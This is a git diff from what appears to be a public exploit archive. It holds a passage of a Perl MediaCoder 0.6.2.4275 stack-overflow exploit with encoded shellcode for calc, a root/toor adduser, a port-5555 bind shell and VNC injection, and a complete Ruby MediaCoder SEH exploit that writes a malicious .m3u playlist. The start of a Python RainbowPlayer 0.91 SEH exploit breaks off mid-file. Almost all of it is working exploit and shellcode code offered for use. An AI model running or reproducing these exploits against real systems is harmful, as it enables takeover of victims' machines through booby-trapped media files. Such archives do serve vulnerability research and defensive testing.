+    "\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41".
+    "\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4c\x56\x4b\x4e".
+    "\x4d\x34\x4a\x4e\x49\x4f\x4f\x4f\x4f\x4f\x4f\x4f\x42\x36\x4b\x38".
+    "\x4e\x46\x46\x42\x46\x32\x4b\x48\x45\x54\x4e\x53\x4b\x58\x4e\x47".
+    "\x45\x30\x4a\x57\x41\x30\x4f\x4e\x4b\x48\x4f\x34\x4a\x31\x4b\x58".
+    "\x4f\x55\x42\x42\x41\x50\x4b\x4e\x49\x54\x4b\x38\x46\x53\x4b\x38".
+    "\x41\x30\x50\x4e\x41\x43\x42\x4c\x49\x39\x4e\x4a\x46\x38\x42\x4c".
+    "\x46\x57\x47\x50\x41\x4c\x4c\x4c\x4d\x30\x41\x30\x44\x4c\x4b\x4e".
+    "\x46\x4f\x4b\x43\x46\x45\x46\x52\x4a\x52\x45\x37\x45\x4e\x4b\x48".
+    "\x4f\x45\x46\x42\x41\x30\x4b\x4e\x48\x36\x4b\x38\x4e\x50\x4b\x34".
+    "\x4b\x48\x4f\x35\x4e\x41\x41\x30\x4b\x4e\x43\x50\x4e\x32\x4b\x38".
+    "\x49\x58\x4e\x56\x46\x42\x4e\x41\x41\x56\x43\x4c\x41\x53\x4b\x4d".
+    "\x46\x36\x4b\x38\x43\x34\x42\x53\x4b\x58\x42\x34\x4e\x30\x4b\x48".
+    "\x42\x47\x4e\x51\x4d\x4a\x4b\x58\x42\x54\x4a\x50\x50\x45\x4a\x56".
+    "\x50\x58\x50\x44\x50\x30\x4e\x4e\x42\x35\x4f\x4f\x48\x4d\x48\x56".
+    "\x43\x35\x48\x46\x4a\x46\x43\x43\x44\x53\x4a\x36\x47\x37\x43\x47".
+    "\x44\x33\x4f\x45\x46\x55\x4f\x4f\x42\x4d\x4a\x46\x4b\x4c\x4d\x4e".
+    "\x4e\x4f\x4b\x53\x42\x45\x4f\x4f\x48\x4d\x4f\x45\x49\x58\x45\x4e".
+    "\x48\x46\x41\x38\x4d\x4e\x4a\x50\x44\x30\x45\x35\x4c\x46\x44\x30".
+    "\x4f\x4f\x42\x4d\x4a\x46\x49\x4d\x49\x30\x45\x4f\x4d\x4a\x47\x45".
+    "\x4f\x4f\x48\x4d\x43\x55\x43\x35\x43\x45\x43\x55\x43\x55\x43\x34".
+    "\x43\x45\x43\x54\x43\x35\x4f\x4f\x42\x4d\x48\x36\x4a\x36\x45\x41".
+    "\x43\x4b\x48\x36\x43\x45\x49\x38\x41\x4e\x45\x49\x4a\x56\x46\x4a".
+    "\x4c\x41\x42\x57\x47\x4c\x47\x45\x4f\x4f\x48\x4d\x4c\x46\x42\x41".
+    "\x41\x55\x45\x45\x4f\x4f\x42\x4d\x4a\x36\x46\x4a\x4d\x4a\x50\x52".
+    "\x49\x4e\x47\x35\x4f\x4f\x48\x4d\x43\x55\x45\x55\x4f\x4f\x42\x4d".
+    "\x4a\x36\x45\x4e\x49\x44\x48\x58\x49\x44\x47\x45\x4f\x4f\x48\x4d".
+    "\x42\x45\x46\x35\x46\x55\x45\x35\x4f\x4f\x42\x4d\x43\x39\x4a\x46".
+    "\x47\x4e\x49\x57\x48\x4c\x49\x37\x47\x55\x4f\x4f\x48\x4d\x45\x45".
+    "\x4f\x4f\x42\x4d\x48\x36\x4c\x46\x46\x36\x48\x36\x4a\x56\x43\x36".
+    "\x4d\x36\x49\x58\x45\x4e\x4c\x56\x42\x55\x49\x35\x49\x52\x4e\x4c".
+    "\x49\x58\x47\x4e\x4c\x36\x46\x34\x49\x48\x44\x4e\x41\x43\x42\x4c".
+    "\x43\x4f\x4c\x4a\x50\x4f\x44\x54\x4d\x52\x50\x4f\x44\x54\x4e\x32".
+    "\x43\x39\x4d\x38\x4c\x47\x4a\x33\x4b\x4a\x4b\x4a\x4b\x4a\x4a\x56".
+    "\x44\x47\x50\x4f\x43\x4b\x48\x51\x4f\x4f\x45\x57\x46\x34\x4f\x4f".
+    "\x48\x4d\x4b\x35\x47\x35\x44\x45\x41\x55\x41\x35\x41\x55\x4c\x36".
+    "\x41\x30\x41\x55\x41\x35\x45\x35\x41\x45\x4f\x4f\x42\x4d\x4a\x46".
+    "\x4d\x4a\x49\x4d\x45\x30\x50\x4c\x43\x35\x4f\x4f\x48\x4d\x4c\x46".
+    "\x4f\x4f\x4f\x4f\x47\x53\x4f\x4f\x42\x4d\x4b\x38\x47\x45\x4e\x4f".
+    "\x43\x38\x46\x4c\x46\x46\x4f\x4f\x48\x4d\x44\x45\x4f\x4f\x42\x4d".
+    "\x4a\x56\x42\x4f\x4c\x58\x46\x30\x4f\x55\x43\x35\x4f\x4f\x48\x4d".
+    "\x4f\x4f\x42\x4d\x5a";
+
+# win32_bind_vncinject -  VNCDLL=/home/opcode/msfweb/framework/data/vncdll.dll EXITFUNC=seh AUTOVNC=1 VNCPORT=5900 LPORT=4444 Size=649 Encoder=PexAlphaNum http://metasploit.com
+my $bind_vncinject =
+       "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49".
+    "\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36".
+    "\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34".
+    "\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41".
+    "\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4a\x4e\x48\x55\x42\x50".
+    "\x42\x30\x42\x30\x43\x55\x45\x35\x48\x45\x47\x45\x4b\x38\x4e\x36".
+    "\x46\x42\x4a\x31\x4b\x38\x45\x54\x4e\x33\x4b\x48\x46\x55\x45\x30".
+    "\x4a\x47\x41\x50\x4c\x4e\x4b\x58\x4c\x54\x4a\x31\x4b\x48\x4c\x55".
+    "\x42\x42\x41\x50\x4b\x4e\x43\x4e\x44\x43\x49\x54\x4b\x58\x46\x33".
+    "\x4b\x48\x41\x30\x50\x4e\x41\x33\x4f\x4f\x4e\x4f\x41\x43\x42\x4c".
+    "\x4e\x4a\x4a\x53\x42\x4e\x46\x57\x47\x30\x41\x4c\x4f\x4c\x4d\x30".
+    "\x41\x30\x47\x4c\x4b\x4e\x44\x4f\x4b\x33\x4e\x47\x46\x42\x46\x51".
+    "\x45\x37\x41\x4e\x4b\x38\x4c\x35\x46\x52\x41\x30\x4b\x4e\x48\x56".
+    "\x4b\x58\x4e\x50\x4b\x54\x4b\x48\x4c\x55\x4e\x51\x41\x30\x4b\x4e".
+    "\x4b\x58\x46\x30\x4b\x58\x41\x50\x4a\x4e\x4b\x4e\x44\x50\x41\x43".
+    "\x42\x4c\x4f\x35\x50\x35\x4d\x35\x4b\x45\x44\x4c\x4a\x50\x42\x50".
+    "\x50\x55\x4c\x36\x42\x33\x49\x55\x46\x46\x4b\x58\x49\x31\x4b\x38".
+    "\x4b\x45\x4e\x50\x4b\x38\x4b\x35\x4e\x31\x4b\x48\x4b\x51\x4b\x58".
+    "\x4b\x45\x4a\x30\x43\x55\x4a\x56\x50\x38\x50\x34\x50\x50\x4e\x4e".
+    "\x4f\x4f\x48\x4d\x49\x48\x47\x4c\x41\x58\x4e\x4e\x42\x50\x41\x50".
+    "\x42\x50\x42\x30\x47\x45\x48\x55\x43\x45\x49\x38\x45\x4e\x4a\x4e".
+    "\x47\x52\x42\x30\x42\x30\x42\x30\x42\x59\x41\x50\x42\x30\x42\x50".
+    "\x48\x4b\x49\x51\x4a\x51\x47\x4e\x46\x4a\x49\x31\x42\x47\x49\x4e".
+    "\x45\x4e\x49\x54\x48\x58\x49\x54\x46\x4a\x4c\x51\x42\x37\x47\x4c".
+    "\x46\x4a\x4d\x4a\x50\x42\x49\x4e\x49\x4d\x49\x50\x45\x4f\x4d\x4a".
+    "\x4b\x4c\x4d\x4e\x4e\x4f\x4b\x43\x47\x45\x43\x35\x44\x33\x4f\x45".
+    "\x43\x33\x44\x43\x42\x30\x4b\x45\x4d\x38\x4b\x34\x42\x42\x41\x55".
+    "\x4f\x4f\x47\x4d\x49\x58\x4f\x4d\x49\x38\x43\x4c\x4d\x58\x45\x47".
+    "\x46\x41\x4c\x36\x47\x30\x49\x45\x41\x35\x43\x45\x4f\x4f\x46\x43".
+    "\x4f\x38\x4f\x4f\x45\x35\x46\x50\x49\x35\x49\x58\x46\x50\x50\x48".
+    "\x44\x4e\x44\x4f\x4b\x32\x47\x52\x46\x35\x4f\x4f\x47\x43\x4f\x4f".
+    "\x45\x35\x42\x43\x41\x53\x42\x4c\x42\x45\x42\x35\x42\x35\x42\x55".
+    "\x42\x54\x42\x55\x42\x44\x42\x35\x4f\x4f\x45\x45\x4e\x32\x49\x48".
+    "\x47\x4c\x41\x53\x4b\x4d\x43\x45\x43\x45\x4a\x46\x44\x30\x42\x50".
+    "\x41\x31\x4e\x55\x49\x48\x42\x4e\x4c\x36\x42\x31\x42\x35\x47\x55".
+    "\x4f\x4f\x45\x35\x46\x32\x43\x55\x47\x45\x4f\x4f\x45\x45\x4a\x32".
+    "\x43\x55\x46\x35\x47\x45\x4f\x4f\x45\x55\x42\x32\x49\x48\x47\x4c".
+    "\x41\x58\x4e\x4e\x42\x50\x42\x31\x42\x50\x42\x50\x49\x58\x43\x4e".
+    "\x4c\x46\x42\x50\x4a\x46\x42\x30\x42\x51\x42\x30\x42\x30\x43\x35".
+    "\x47\x45\x4f\x4f\x45\x35\x4a\x31\x41\x58\x4e\x4e\x42\x30\x46\x30".
+    "\x42\x30\x42\x30\x4f\x4f\x43\x4d\x5a";
+$id = $ARGV[0];
+if ($id==1){
+print "$header.$junk.$ret.$nop.$calc_shell.$nop";
+exit;
+}
+if ($id==2){
+print "$header.$junk.$ret.$nop.$adduser_shell.$nop";
+exit;
+}
+if ($id==3){
+print "$header.$junk.$ret.$nop.$bind_shell.$nop";
+exit;
+}
+if ($id==4){
+print "$header.$junk.$ret.$nop.$bind_vncinject.$nop";
+exit;
+}
+print "\n";
+print " ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++\n";
+print " +++                                                        +++\n";
+print " +++                                                        +++\n";
+print " +++ MediaCoder 0.6.2.4275 Universal Stack-Based Overflow   +++\n";
+print " +++ Written By Stack                                       +++\n";
+print " +++                                                        +++\n";
+print " +++   Usage Ex.: perl $0 1 >>Exploit.m3u              +++\n";
+print " +++                                                        +++\n";
+print " +++  Options:                                              +++\n";
+print " +++          1 - win32_exec calc.exe                       +++\n";
+print " +++          2 - win32_adduser Pass=toor User=root         +++\n";
+print " +++          3 - win32_bind Port 5555                      +++\n";
+print " +++          4 - win32_bind_vncinject Port 5900            +++\n";
+print " +++                                                        +++\n";
+print " +++                                                        +++\n";
+print " +++                                                        +++\n";
+print " ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++\n";
+exit;
+#EOF
+
+# milw0rm.com [2009-03-09]
diff --git a/platforms/windows/local/8179.rb b/platforms/windows/local/8179.rb
index 6e3ca8bdd..de2110686 100755
--- a/platforms/windows/local/8179.rb
+++ b/platforms/windows/local/8179.rb
@@ -1,98 +1,98 @@
-#!/usr/bin/env ruby
-# MediaCoder 0.6.2.4275 Universal Buffer Overflow Exploit (SEH)
-# Universal SEH Overwrite Exploit
-# By Stack
-# Mountassif Moad
-# Download app : http://mediacoder.sourceforge.net/mirrors.htm?file=MediaCoder-0.6.2.4275.exe
-# cat Greatz.txt
-# Jadi-Chel7 & Mr.Safa7 & Houssamix & Simo-Soft & DDos & Simo64 & G0rillaz & Issam & Sec-Alert & & Bohayra & j0rd4n14n.r1z
-# Webug & Travis-Barker & Keyo & General l0s3r & NeoCoderz & welahima b9ite 3arefe chkoune akhore rani tansa :d
-# ahe nsite big thnx to Str0ke and thanks you for all patience and your advice & support
-time3 = Time.new
-puts "Exploit Started in Current Time :" + time3.inspect
-puts "Enter Name For your File Like : Stack"
-files = gets.chomp.capitalize
-puts "Name Of File : " + files +'.m3u'
-time1 = Time.new
-$VERBOSE=nil
-Header = 
-"\x23\x45\x58\x54\x4D\x33\x55\x0D\x0A\x23\x45\x58\x54\x49\x4E\x46"+
-"\x3A\x33\x3A\x35\x30\x2C\x4C\x61\x6D\x62\x20\x4F\x66\x20\x47\x6F"+
-"\x64\x20\x2D\x20\x53\x65\x74\x20\x54\x6F\x20\x46\x61\x69\x6C\x20"+
-"\x0D\x0A\x44\x3A\x5C"
-# win32_adduser -  PASS=toor EXITFUNC=seh USER=root Size=489 Encoder=PexAlphaNum http://metasploit.com
-Shellscode =
-"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"+
-"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"+
-"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34"+
-"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41"+
-"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x54"+
-"\x42\x50\x42\x30\x42\x30\x4b\x38\x45\x54\x4e\x33\x4b\x38\x4e\x47"+
-"\x45\x30\x4a\x57\x41\x50\x4f\x4e\x4b\x58\x4f\x54\x4a\x31\x4b\x48"+
-"\x4f\x35\x42\x32\x41\x50\x4b\x4e\x49\x54\x4b\x58\x46\x53\x4b\x58"+
-"\x41\x30\x50\x4e\x41\x43\x42\x4c\x49\x39\x4e\x4a\x46\x58\x42\x4c"+
-"\x46\x57\x47\x30\x41\x4c\x4c\x4c\x4d\x50\x41\x50\x44\x4c\x4b\x4e"+
-"\x46\x4f\x4b\x33\x46\x45\x46\x42\x46\x50\x45\x57\x45\x4e\x4b\x48"+
-"\x4f\x55\x46\x42\x41\x30\x4b\x4e\x48\x56\x4b\x48\x4e\x50\x4b\x34"+
-"\x4b\x48\x4f\x35\x4e\x31\x41\x30\x4b\x4e\x4b\x48\x4e\x41\x4b\x58"+
-"\x41\x30\x4b\x4e\x49\x38\x4e\x45\x46\x52\x46\x30\x43\x4c\x41\x53"+
-"\x42\x4c\x46\x36\x4b\x38\x42\x44\x42\x53\x45\x38\x42\x4c\x4a\x57"+
-"\x4e\x50\x4b\x38\x42\x54\x4e\x50\x4b\x58\x42\x57\x4e\x41\x4d\x4a"+
-"\x4b\x38\x4a\x56\x4a\x30\x4b\x4e\x49\x30\x4b\x48\x42\x58\x42\x4b"+
-"\x42\x50\x42\x30\x42\x50\x4b\x48\x4a\x46\x4e\x43\x4f\x35\x41\x53"+
-"\x48\x4f\x42\x46\x48\x55\x49\x48\x4a\x4f\x43\x48\x42\x4c\x4b\x37"+
-"\x42\x55\x4a\x56\x42\x4f\x4c\x58\x46\x50\x4f\x45\x4a\x36\x4a\x39"+
-"\x50\x4f\x4c\x58\x50\x30\x47\x35\x4f\x4f\x47\x4e\x43\x46\x4d\x46"+
-"\x46\x56\x50\x52\x45\x36\x4a\x47\x45\x46\x42\x52\x4f\x32\x43\x46"+
-"\x42\x52\x50\x56\x45\x56\x46\x37\x42\x52\x45\x57\x43\x57\x45\x46"+
-"\x44\x37\x42\x32\x44\x47\x4f\x46\x4f\x56\x46\x37\x42\x32\x46\x37"+
-"\x4f\x36\x4f\x56\x44\x57\x42\x52\x4f\x42\x41\x44\x46\x54\x46\x34"+
-"\x42\x52\x48\x52\x48\x52\x42\x32\x50\x56\x45\x36\x46\x37\x42\x52"+
-"\x4e\x36\x4f\x46\x43\x56\x41\x56\x4e\x36\x47\x36\x44\x57\x4f\x36"+
-"\x45\x57\x42\x47\x42\x52\x41\x34\x46\x46\x4d\x36\x49\x46\x50\x56"+
-"\x49\x36\x43\x47\x46\x47\x44\x37\x41\x36\x46\x57\x4f\x56\x44\x57"+
-"\x43\x47\x42\x32\x44\x57\x4f\x56\x4f\x46\x46\x47\x42\x32\x4f\x32"+
-"\x41\x54\x46\x54\x46\x54\x42\x50\x5a"
-# Media_bruteforcer_shellcode
-Bruteforce = # BruteForce the shellcode to runing if it dont work in the first methode
-"\xD0\x62\x43"+        #  SHL BYTE PTR DS:[EDX+43],1
-"\x00\xB8\x6D"+        #  ADD BYTE PTR DS:[EAX+1ABBB6D],BH
-"\xBB\xAB\x01"+
-"\x00\x00"+            #  ADD BYTE PTR DS:[EAX],AL
-"\x00\xF0"+            #  ADD AL,DH
-"\xFF\x13"+            #  CALL DWORD PTR DS:[EBX]
-"\x00\x4F\x6D"+        #  ADD BYTE PTR DS:[EDI+6D],CL
-"\x81\x7C\x38\x07"+    #  CMP DWORD PTR DS:[EAX+EDI+7],FFFF7C92
-"\x92\x7C\xFF"+
-"\xFF\xFF" + Shellscode
-Rhunter =
-"\x5B"+             #POP EBX
-"\x90" * 10 +       # NOP x 10  
-"\x90\x90"+         # NOP NOP
-"\x8D\x44\xC1\x04"+ # LEA EAX,DWORD PTR DS:[ECX+EAX*8+4]
-"\x8B\x1E"+         # MOV EBX,DWORD PTR DS:[ESI]
-"\x89\x18"+         # MOV DWORD PTR DS:[EAX],EBX
-"\x89\x06"+         # MOV DWORD PTR DS:[ESI],EAX
-"\x42"+             # INC EDX
-"\x83\xFA\x64"+     # CMP EDX,64
-"\x75\xEC"+         # JNZ SHORT dsp_chmx.0169127E
-"\x8B\x06"+         # MOV EAX,DWORD PTR DS:[ESI]
-"\x8B\x10"+         # MOV EDX,DWORD PTR DS:[EAX]
-"\x89\x16"+         # MOV DWORD PTR DS:[ESI],EDX
-"\x5E"+             # POP ESI
-"\x5B"+             # POP EBX
-"\x93\x43"+         # CALL ESP
-"\x92\x7c"
-Over     = "\x41" * 195 + "\xff\xff\xff\xff" + "\x47" * 4 + "\x42" * 6 + "\xff\xff\x47\x47\x47\xFF\x65\x78\x77\x76"
-Nop      = "\x90" * 8
-Next_Seh = "\xeb\x06\xff\xff"
-Seh      = "\x93\xB6\x98\x7C" 
-Nopsled  = "\x90" * 7
-Xpl = Header + Over + Rhunter + Nop + Shellscode + Nopsled + Next_Seh + Seh + Nop + Bruteforce + Nopsled
-File.open( files+".m3u", "w" ) do |the_file|
-the_file.puts(Xpl)
-puts "Exploit finished in Current Time :" + time1.inspect
-puts "Now Open " + files +".m3u :d"
-end
-
-# milw0rm.com [2009-03-09]
+#!/usr/bin/env ruby
+# MediaCoder 0.6.2.4275 Universal Buffer Overflow Exploit (SEH)
+# Universal SEH Overwrite Exploit
+# By Stack
+# Mountassif Moad
+# Download app : http://mediacoder.sourceforge.net/mirrors.htm?file=MediaCoder-0.6.2.4275.exe
+# cat Greatz.txt
+# Jadi-Chel7 & Mr.Safa7 & Houssamix & Simo-Soft & DDos & Simo64 & G0rillaz & Issam & Sec-Alert & & Bohayra & j0rd4n14n.r1z
+# Webug & Travis-Barker & Keyo & General l0s3r & NeoCoderz & welahima b9ite 3arefe chkoune akhore rani tansa :d
+# ahe nsite big thnx to Str0ke and thanks you for all patience and your advice & support
+time3 = Time.new
+puts "Exploit Started in Current Time :" + time3.inspect
+puts "Enter Name For your File Like : Stack"
+files = gets.chomp.capitalize
+puts "Name Of File : " + files +'.m3u'
+time1 = Time.new
+$VERBOSE=nil
+Header = 
+"\x23\x45\x58\x54\x4D\x33\x55\x0D\x0A\x23\x45\x58\x54\x49\x4E\x46"+
+"\x3A\x33\x3A\x35\x30\x2C\x4C\x61\x6D\x62\x20\x4F\x66\x20\x47\x6F"+
+"\x64\x20\x2D\x20\x53\x65\x74\x20\x54\x6F\x20\x46\x61\x69\x6C\x20"+
+"\x0D\x0A\x44\x3A\x5C"
+# win32_adduser -  PASS=toor EXITFUNC=seh USER=root Size=489 Encoder=PexAlphaNum http://metasploit.com
+Shellscode =
+"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"+
+"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"+
+"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34"+
+"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41"+
+"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x4e\x4f\x4a\x4e\x46\x54"+
+"\x42\x50\x42\x30\x42\x30\x4b\x38\x45\x54\x4e\x33\x4b\x38\x4e\x47"+
+"\x45\x30\x4a\x57\x41\x50\x4f\x4e\x4b\x58\x4f\x54\x4a\x31\x4b\x48"+
+"\x4f\x35\x42\x32\x41\x50\x4b\x4e\x49\x54\x4b\x58\x46\x53\x4b\x58"+
+"\x41\x30\x50\x4e\x41\x43\x42\x4c\x49\x39\x4e\x4a\x46\x58\x42\x4c"+
+"\x46\x57\x47\x30\x41\x4c\x4c\x4c\x4d\x50\x41\x50\x44\x4c\x4b\x4e"+
+"\x46\x4f\x4b\x33\x46\x45\x46\x42\x46\x50\x45\x57\x45\x4e\x4b\x48"+
+"\x4f\x55\x46\x42\x41\x30\x4b\x4e\x48\x56\x4b\x48\x4e\x50\x4b\x34"+
+"\x4b\x48\x4f\x35\x4e\x31\x41\x30\x4b\x4e\x4b\x48\x4e\x41\x4b\x58"+
+"\x41\x30\x4b\x4e\x49\x38\x4e\x45\x46\x52\x46\x30\x43\x4c\x41\x53"+
+"\x42\x4c\x46\x36\x4b\x38\x42\x44\x42\x53\x45\x38\x42\x4c\x4a\x57"+
+"\x4e\x50\x4b\x38\x42\x54\x4e\x50\x4b\x58\x42\x57\x4e\x41\x4d\x4a"+
+"\x4b\x38\x4a\x56\x4a\x30\x4b\x4e\x49\x30\x4b\x48\x42\x58\x42\x4b"+
+"\x42\x50\x42\x30\x42\x50\x4b\x48\x4a\x46\x4e\x43\x4f\x35\x41\x53"+
+"\x48\x4f\x42\x46\x48\x55\x49\x48\x4a\x4f\x43\x48\x42\x4c\x4b\x37"+
+"\x42\x55\x4a\x56\x42\x4f\x4c\x58\x46\x50\x4f\x45\x4a\x36\x4a\x39"+
+"\x50\x4f\x4c\x58\x50\x30\x47\x35\x4f\x4f\x47\x4e\x43\x46\x4d\x46"+
+"\x46\x56\x50\x52\x45\x36\x4a\x47\x45\x46\x42\x52\x4f\x32\x43\x46"+
+"\x42\x52\x50\x56\x45\x56\x46\x37\x42\x52\x45\x57\x43\x57\x45\x46"+
+"\x44\x37\x42\x32\x44\x47\x4f\x46\x4f\x56\x46\x37\x42\x32\x46\x37"+
+"\x4f\x36\x4f\x56\x44\x57\x42\x52\x4f\x42\x41\x44\x46\x54\x46\x34"+
+"\x42\x52\x48\x52\x48\x52\x42\x32\x50\x56\x45\x36\x46\x37\x42\x52"+
+"\x4e\x36\x4f\x46\x43\x56\x41\x56\x4e\x36\x47\x36\x44\x57\x4f\x36"+
+"\x45\x57\x42\x47\x42\x52\x41\x34\x46\x46\x4d\x36\x49\x46\x50\x56"+
+"\x49\x36\x43\x47\x46\x47\x44\x37\x41\x36\x46\x57\x4f\x56\x44\x57"+
+"\x43\x47\x42\x32\x44\x57\x4f\x56\x4f\x46\x46\x47\x42\x32\x4f\x32"+
+"\x41\x54\x46\x54\x46\x54\x42\x50\x5a"
+# Media_bruteforcer_shellcode
+Bruteforce = # BruteForce the shellcode to runing if it dont work in the first methode
+"\xD0\x62\x43"+        #  SHL BYTE PTR DS:[EDX+43],1
+"\x00\xB8\x6D"+        #  ADD BYTE PTR DS:[EAX+1ABBB6D],BH
+"\xBB\xAB\x01"+
+"\x00\x00"+            #  ADD BYTE PTR DS:[EAX],AL
+"\x00\xF0"+            #  ADD AL,DH
+"\xFF\x13"+            #  CALL DWORD PTR DS:[EBX]
+"\x00\x4F\x6D"+        #  ADD BYTE PTR DS:[EDI+6D],CL
+"\x81\x7C\x38\x07"+    #  CMP DWORD PTR DS:[EAX+EDI+7],FFFF7C92
+"\x92\x7C\xFF"+
+"\xFF\xFF" + Shellscode
+Rhunter =
+"\x5B"+             #POP EBX
+"\x90" * 10 +       # NOP x 10  
+"\x90\x90"+         # NOP NOP
+"\x8D\x44\xC1\x04"+ # LEA EAX,DWORD PTR DS:[ECX+EAX*8+4]
+"\x8B\x1E"+         # MOV EBX,DWORD PTR DS:[ESI]
+"\x89\x18"+         # MOV DWORD PTR DS:[EAX],EBX
+"\x89\x06"+         # MOV DWORD PTR DS:[ESI],EAX
+"\x42"+             # INC EDX
+"\x83\xFA\x64"+     # CMP EDX,64
+"\x75\xEC"+         # JNZ SHORT dsp_chmx.0169127E
+"\x8B\x06"+         # MOV EAX,DWORD PTR DS:[ESI]
+"\x8B\x10"+         # MOV EDX,DWORD PTR DS:[EAX]
+"\x89\x16"+         # MOV DWORD PTR DS:[ESI],EDX
+"\x5E"+             # POP ESI
+"\x5B"+             # POP EBX
+"\x93\x43"+         # CALL ESP
+"\x92\x7c"
+Over     = "\x41" * 195 + "\xff\xff\xff\xff" + "\x47" * 4 + "\x42" * 6 + "\xff\xff\x47\x47\x47\xFF\x65\x78\x77\x76"
+Nop      = "\x90" * 8
+Next_Seh = "\xeb\x06\xff\xff"
+Seh      = "\x93\xB6\x98\x7C" 
+Nopsled  = "\x90" * 7
+Xpl = Header + Over + Rhunter + Nop + Shellscode + Nopsled + Next_Seh + Seh + Nop + Bruteforce + Nopsled
+File.open( files+".m3u", "w" ) do |the_file|
+the_file.puts(Xpl)
+puts "Exploit finished in Current Time :" + time1.inspect
+puts "Now Open " + files +".m3u :d"
+end
+
+# milw0rm.com [2009-03-09]
diff --git a/platforms/windows/local/8193.py b/platforms/windows/local/8193.py
index 51f60320b..ea2a252bf 100755
--- a/platforms/windows/local/8193.py
+++ b/platforms/windows/local/8193.py
@@ -1,59 +1,59 @@
-#usage: exploit.py
-#Software download: http://www.nanocodesoft.com/products/rainbowplayer/rp091.exe
-#
-print "**************************************************************************"
-print " RainbowPlayer 0.91 (playlist) Universal Seh Overwrite Exploit\n"
-print " Author : His0k4"
-print " Tested on: Windows XP Pro SP2 Fr\n"
-print " Greetings to:"
-print " All friends & muslims HaCkers(dz)\n"
-print "**************************************************************************"
-         	
-			
-buff = "\x41" * 605
-
-next_seh = "\xEB\x06\x41\x41"
-
-seh = "\x08\x2A\x01\x10"
-
-
-header1= "\x22\x65\x78\x70\x6C\x6F\x69\x74\x2E\x6D\x70\x33\x22\x20\x30\x0A\x22\x43\x3A\x5C"
-header2= "\x2E\x6D\x70\x33\x22"
-
-# win32_exec -  EXITFUNC=seh CMD=calc Size=330 Encoder=Alpha2 http://metasploit.com
-shellcode = (
-	"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x49\x49\x49\x49"
-	"\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x48\x49\x51\x5a\x6a\x67"
-	"\x58\x50\x30\x42\x30\x42\x6b\x42\x41\x77\x41\x42\x32\x42\x41\x32"
-	"\x41\x41\x30\x41\x41\x58\x38\x42\x42\x50\x75\x6b\x59\x79\x6c\x6b"
-	"\x58\x37\x34\x53\x30\x35\x50\x53\x30\x6c\x4b\x41\x55\x47\x4c\x6c"
-	"\x4b\x51\x6c\x63\x35\x54\x38\x77\x71\x7a\x4f\x6e\x6b\x70\x4f\x74"
-	"\x58\x4e\x6b\x43\x6f\x37\x50\x43\x31\x5a\x4b\x47\x39\x4e\x6b\x37"
-	"\x44\x6c\x4b\x45\x51\x58\x6e\x37\x41\x6b\x70\x6c\x59\x6c\x6c\x4f"
-	"\x74\x6f\x30\x62\x54\x47\x77\x6b\x71\x59\x5a\x76\x6d\x74\x41\x6b"
-	"\x72\x58\x6b\x69\x64\x65\x6b\x41\x44\x47\x54\x34\x44\x44\x35\x38"
-	"\x65\x6e\x6b\x33\x6f\x31\x34\x37\x71\x6a\x4b\x51\x76\x6e\x6b\x44"
-	"\x4c\x42\x6b\x6e\x6b\x43\x6f\x57\x6c\x55\x51\x6a\x4b\x4c\x4b\x47"
-	"\x6c\x4e\x6b\x75\x51\x4a\x4b\x4e\x69\x31\x4c\x66\x44\x37\x74\x4f"
-	"\x33\x55\x61\x4f\x30\x30\x64\x6e\x6b\x77\x30\x36\x50\x4e\x65\x39"
-	"\x50\x31\x68\x64\x4c\x6c\x4b\x73\x70\x36\x6c\x6e\x6b\x30\x70\x37"
-	"\x6c\x6c\x6d\x4e\x6b\x45\x38\x45\x58\x58\x6b\x73\x39\x6e\x6b\x4b"
-	"\x30\x4e\x50\x75\x50\x73\x30\x63\x30\x6c\x4b\x45\x38\x65\x6c\x31"
-	"\x4f\x30\x31\x4c\x36\x75\x30\x32\x76\x6d\x59\x59\x68\x6c\x43\x4b"
-	"\x70\x41\x6b\x46\x30\x45\x38\x48\x70\x4e\x6a\x65\x54\x43\x6f\x71"
-	"\x78\x4f\x68\x59\x6e\x4c\x4a\x76\x6e\x52\x77\x6b\x4f\x6b\x57\x72"
-	"\x43\x53\x51\x30\x6c\x52\x43\x77\x70\x67"
-    )
-
-	
-exploit = header1 + buff + next_seh + seh + shellcode + header2
-
-try:
-    out_file = open("rainbow.rpl",'w')
-    out_file.write(exploit)
-    out_file.close()
-    print "Exploit file created!\n"
-except:
-    print "Error"
-
-# milw0rm.com [2009-03-10]
+#usage: exploit.py
+#Software download: http://www.nanocodesoft.com/products/rainbowplayer/rp091.exe
+#
+print "**************************************************************************"
+print " RainbowPlayer 0.91 (playlist) Universal Seh Overwrite Exploit\n"
+print " Author : His0k4"
+print " Tested on: Windows XP Pro SP2 Fr\n"
+print " Greetings to:"
+print " All friends & muslims HaCkers(dz)\n"
+print "**************************************************************************"
+         	
+			
+buff = "\x41" * 605
+
+next_seh = "\xEB\x06\x41\x41"
+
